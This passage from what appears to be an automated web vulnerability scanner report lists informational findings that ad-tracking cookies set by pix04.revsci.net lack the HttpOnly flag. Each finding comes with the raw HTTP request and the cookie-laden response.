rtc_xNIB=MLvv9aEOYT5j57ifixrq7MypO1kpmAW3jAX8npqiREgE/DkJ/NiVVqHNx4VzX5l4ou2be6wmaiY+FuIzIBY8LyUBBvjnoXyr57fk8UH/q5eICMks3cmQwVKsWcfTKfuIPxHmracEEDhg0PpDsTPxkmfOEmzRjViqWq5DAJflrTDaM/cNLgfxNfxdB2EXHWdPGQoogkN6dheaiJYNxNgJl0tTU7TAt3g6FkZAF0a5M1+Qr2mExBWKwdHOs6ixiLay82KyMj3L8NBO5iV8xDXWYAaMO33KTI86GimXkvVNNW8Mwqsnv0+bWPaCqyN8foLrlfXDEQArn4BsO43QoQzst1wLE1gzxWrwNlbj2jI228s/gRNUvhO2dkLGiwOsVKa5MdfOF5Ty373AI52IyBwSeqn5gfiqUejzz2iIx2jqU1AWrUVpepsbaxea/ksje4mbpa+ulGNp4Z0MGQKki911fKipzdEfO3oS9oKg9oLL0UkcWq+FfVKbc4duBwjL8RIVNgfbQbGwSNQ9NLKGEGvZPMio00MIwlSqzSwqehW7JHUVhmSYic6Iy+bKBt1hO2xHfNcuMHSnjV4tXGEPNpCqxBZN84tRP0YoFSk44aJ8kGk4M4qtJjAeXTKRLs3/r2X4g0pJ10I/PnFi2eBHQx1YcL0bayGPHcarbHvwoYodig2hrif1WHj1Fszt1c2arQDymiTuVgRA4ZA3Vu5K; udm_0=MLv39CEJZjpv597JCM1YKC+qfowJLkXm5HzcyJTaomayNeTIOt0mZGCnnxCU3g5Fl7++17leNm8ffHAB6b/mVCtcPC0+5TNgOqGlLOcs7kcw6WMqaKWl2kIvQZjEsolL0pz4vf6LEszPlgna/4OBy5/4ZkTTspiv9Msm6hzYCWbeP2g+R5/58eVFI8tRMfSjfnQLqH0/pEMmXXwmwuU8xD+kpzoEsTO7ez5HPy5K+mbh4LfHaMsWCL+XCTKWI9cdmIHl+gVPDTgc3CK8pLaz/7jrNk0pxHNOuHrk4FVkIDy9k2EMXKHSpygrcSIf7V0cXWR0V/SY2w0OzR5WIy7wVWesqdD0kNEUpdOZDrMhImy9MetxZAY/dYUYac7pgETe1YmNjk3G1SVS5XidmU7it/alnDLr7a6rBDiERDC0Lwmk0X2/WdHopasjBk9zXTQ5vymOk6PP8fTs+kGg8y9zoCfQjEhJI59YlVgsN2RbWcLxJ2ltXPcKVi6nKjKJgsfoZVrO2oHGAsWHqCrRziso12dwImO0oREKvquBMv8eypqMG2flmwPHuOnQavYplsHHbLFAK5PxjJhvGwP6B5fMyC68hk3aZMv2Ulug8AJdqWwTKCHtI0K9vgNTLcuQSLIa0T5yNdb6h1hyeG9btd9iyQMBQ4qsMf5kv67ybYgZgigDt5iY/OiCnqWhPexftsafKgOtBMBHwSMUMJQ/2tbGafyiMt6zPL3Xz5/btLPnBQG9mxDc6ZK2l9Oy3v37eFnWjY/J3ov/3q1tBXFezOPwGquiA8AUqL7LrKghR+Rvb8j/LAEShkTECSaC+LWwnz6ocbagwIqFFnAKWAEdy5DE6GhRR4elWwss77kfDtrC2Ends9TFrD/LjKNmZnicyRiU4xlFhQDgppNnnirTaZwTFK60mrg3th0XTTpTOCw+yPFKxeD4FVhNz0FcHh6yuWmKUTkbwk318gZQDfBORxTABzOBilvBEyiOCylwVOuHpFOA1pO1YY9xpWyYg6bhGYSyukJ9jxxM1x6qhi5mLBhvo8a1HTvQTZMC0o/HK+7tLhzPdDM+hTYWisTFw8/QVkhQ+wcbbEwOxhcU73M6QervSnu/q9Dq9+72SG+a2W+PLWrKgOExYBUsBOWpfyVUCb0ASJyPeTOShSVhaQ+fCBvu3XUPxGaOzpGoVD3dQkBOpy5C+1PgxsexVbXgZjAUSQQSfBssmqLcDaVpLyxs+Qopl4Kn563r+MBJgq6zq/TwkNvi/qCkpyT863ibLn3vMNFkJ//YQej4a1f1nAYsSi+KPX8m4ccideWG+VIWkdIeml4cyFsqF+rwR7f62ebxite6HhDXOQZW7V3XjcIb99328u1In9UmhJ6IOYCM3pMZvBgFi5Bq1sp7ZGCqUTRNOzygkzeI6RIYZZ0LlAJpYUQbqlROZdomQThaWYnoIHQ3MS3AA6rHcslHFCVSAuglUFRCsjlstdv++yQ96TcbUvSKhgGjcUjJD0R6kXUu8bCV

Response

HTTP/1.1 200 OK
Set-Cookie: rsi_segs_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJkOBr3IMlp94u+w/laQbf6+az8ELNM5Vc4Rolb9lsncbnFjc6nNskvAlloepK+Ek9geEt3gSIwarfPSfqUd5S4nO0iB2YlcZM/NMKin8fzqXUSnC/Sy1tsi7RILbY9q7D0SyXQG7ZEunXaEn7I7DP1r5/rxrAaklgMbgsmhMaehsndR6+g/Kzcg2pxWT2q+Ir+rquxk5WgHVNoDYdmoRs7WhdBuQK99wbYBNcLbWfRGIq4vDAVlZnmPVS4S89RbrI+KWMzH/Dne4zg+KyBRIVRXxcYQeHD0L15giwAHxUs6qToLe+S16IWWldioI6MFMYXDTHIG8p+3X9CKHEL/R; Domain=.revsci.net; Expires=Sun, 16-Sep-2012 16:37:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:37:08 GMT
Content-Length: 544

/* AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docu
...[SNIP]...
13.141. http://pix04.revsci.net/F09828/b3/0/3/1008211/677164118.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /F09828/b3/0/3/1008211/677164118.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F09828/b3/0/3/1008211/677164118.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.quickandsimple.com%252F%253Fbpid%253D%2526p%253Dhearst%2526n%253DUS%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fhearst.com%252Fnewspapers%252Fmetrix4media.php%26DM_EOM%3D1&C=I09839%2CF09828 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Set-Cookie: rtc_z0DM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IGDA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pfus=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BRdV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jYH_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fzlq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-mxv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mHcA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HXmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pKCG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Klrm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RU6Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_s926=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b9i7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_rXeX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XwpC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2N5M=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_X46z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gR4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tnvC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HxEK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1zQw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pe6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oybS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__3n9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ix0F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D5V5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gHAY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6BxH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KKED=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_nSm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_458L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_FYNR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b81E=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D3Fl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uDaq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kbwA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xA_8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CJm7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_En3x=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fL1F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bXp4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_w6Dv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dhzb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GwOc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a-37=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ux5A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wENX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mFWT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CY0g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oP87=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_izKJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1vJj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mBmG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xguM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5ff3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5UrE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ptS9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6ZIi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZiTd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zcl2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_G-1g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DiFj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDET=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DkBe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TBg_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sPAt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RGgP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5lwD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1gPF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jRjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UmUi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_d6A3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JEd3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VbSU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4Z5K=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Fl-k=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xNIB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qcRp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_01oy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZVG6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_g7c4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5F6G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oJ_4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_e-a1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_63TE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QL7V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yj5X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fHJO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2J0N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oZK5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bA75=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Fuyk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_nQhF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AdCz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_W_su=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-2l6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__2gm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IaYu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eNoN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_c_QL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_EWGJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_27JF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iZ38=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_feFx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_9tiQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ktrN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_9-p4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_aNV6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UD6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KZb4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_R_Wg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3rey=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yjUI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oE39=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UjBT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-T1o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_c-sa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5PSX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DLGx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AAAA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Cwp7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TJQ1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_32hd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__p2w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DoaW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yjf6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_X8sl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qjwD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Q6zq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mbyP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Qq1P=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QjxO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_W55r=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000="pUPNJUOBr3IMlp94u+w/JTlxrDiJyuY/6HZOz2DKG/pV+zq2jLwjIRKIvhk+8HjFND8Y9dfVLKviOQmZQf5jgIoA2RaRQUEdHyR+sqqJlmlhpyIHYVkWUv7jk8buvVKlNI8edj/GdSN0NUsb0j3CwJE+DG9KWPMwZlOZjQBMWxba9i2uj5ldbft+dkzMH9ghs6hBB6f2l2fLjWwni3HZ8zz8ppJ9mqXAVs95liqcZUTYHa/nsEc4jvlLpNCZyotNtJCBnIk4ipF9g+MCnxFDP9ZLOeRkNoHiaHaJVw/wZLHfIxJXPJqb/Ux3pKiZPmonyrwLQJEi63pYbg8Gw+p+r6HYf/qMWm8ednkptBu8ocSjbV10sruN5QLbollYIN2ISd4tEHfvj8J7fssu/7o="; Version=1; Domain=.revsci.net; Max-Age=31536000; Expires=Sun, 16-Sep-2012 16:37:27 GMT; Path=/
Set-Cookie: rtc_D7sc=MLvv9LUuZh5n5/gHAhoIcUqQhbG0IiulStW4uLhwLED4nV/yEQqSZn7LcwWPHnKx4il3w3EIEI1CzUJC9uwyEiExOKM/KMECMfAA+n8R61OVdM5QoumI2f8AnsuJ0srfsOJmxcPYEF9sp4lx06ZUW3d9bO0nqAJl/T+HT1GYW/hbeFcx6y5OG1W6041ImKEBkVKkUqtbqUuR4cmsRrKeClnqXDBmBaMN9xy5JNqwk+xbpHdk1+9E8UOuoAnWOL8SVNAZ3G5qXl0gLLbshnwub3zIHTZGSjXo6xy1VWKZ2n7lEjQjahwQ3ClMV6nfFPaFI9s9bALBgJgP10Y92vXK3Tsh44mwAdMeeNfBMPp7eFvEK8nT9N+re1TGFc9MLIQi2dpj87smnapZ0nfImAjjmi1VZNmx0WMryj4uCjyZTuAMt6C8FZhKRSOHxMhP43+ZzIiARCMHglmDqqSH4omQvrGabqkNFRlyi9r5m2HvbbHJ5tqWwjY+P3lahwQbKTWINpRCa6wHAt3pCQGljFRXQ/+gGRoN/6zbOMFZBKYvKtHkXQ2kg9hbxKK4qwoZ/ud0Uc0+X1rgtHMcvCOlU16h+bDIeFzn9fTodf0e2POdQP8nTA3iFFRpVatd2FLm4mHPwXsfsy+fM/coldzMofcuLWTVfar59ag3zuCfuZ5ZlqE2qlC05K1Kh+S448y5RuWQvagomeCQQ8ORK6OS/5g102KgEolZrrhas12QVpWZr1XWiXxs8Yh6pFOvqrBi9lsiVZWzVKOmgdVUhx5F0u2ZHJ+J16yr3xzhiR0Y3LsB+dn1ue7ASDwq0BG8UXD3Q5toR1+LC5bN+TKaL8xmqSLwQW6AVyz6KOU8HooJ45Fx/rrG1QpIIjqzlUGRLGEKA+2LoM38O5UMAl/G1sk2BeqqTdxqi4OU1g==; Domain=.revsci.net; Expires=Sun, 16-Sep-2012 16:37:27 GMT; Path=/
Set-Cookie: NETSEGS_F09828=e98f30f2b8e2390e&F09828&0&4e99b6c7&0&&4e7403bf&239be0b9fdae6d2fbd805afcd850cfc7; Domain=.revsci.net; Expires=Sat, 15-Oct-2011 16:37:27 GMT; Path=/
X-Proc-ms: 17
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:37:26 GMT
Content-Length: 902

/* AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) */
rsinetsegs = ['F09828_10664','F09828_10665','F09828_10680','F09828_10702','F09828_10762','F09828_10763','F09828_11018','F09828_11037','F09828_1108
...[SNIP]...
13.142. http://pix04.revsci.net/I09837/b3/0/3/0902121/486412827.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I09837/b3/0/3/0902121/486412827.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I09837/b3/0/3/0902121/486412827.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.realage.com%252F%253Fpage%253D%2526cbr%253Dnull%2526hi%253D%2526a%253D%2526g%253Dundefined%2526b%253D%2526l%253D%2526optin%253D1%2526new%25252Frepeat%253DNew%2526assessment%253Dundefined%2526search%252520term%253D%2526days%252520since%252520last%252520visit%253DFirst%252520page%252520view%252520or%252520cookies%252520not%252520supported%2526search%252520term%253D%2526video%252520name%253Dundefined%2526page%252520url%253Dhttp%25253A%25252F%25252Fwww.realage.com%25252F%2526ad%252520categories%253D%2526ad%252520impression%253Dundefined%2526ad%252520clickthrough%253Dundefined%2526monthly%252520new%252520or%252520return%253DNew%2526traffic%252520source%253D%2526us%25252Fnon%252520us%253D%2526member%25252Fnon%252520member%253Dnon-member%26DM_CAT%3DRealAge%26DM_REF%3Dhttp%253A%252F%252Fhearst.com%252Fnewspapers%252Fmetrix4media.php%26DM_EOM%3D1&C=I09837 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.realage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Set-Cookie: rsi_segs_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
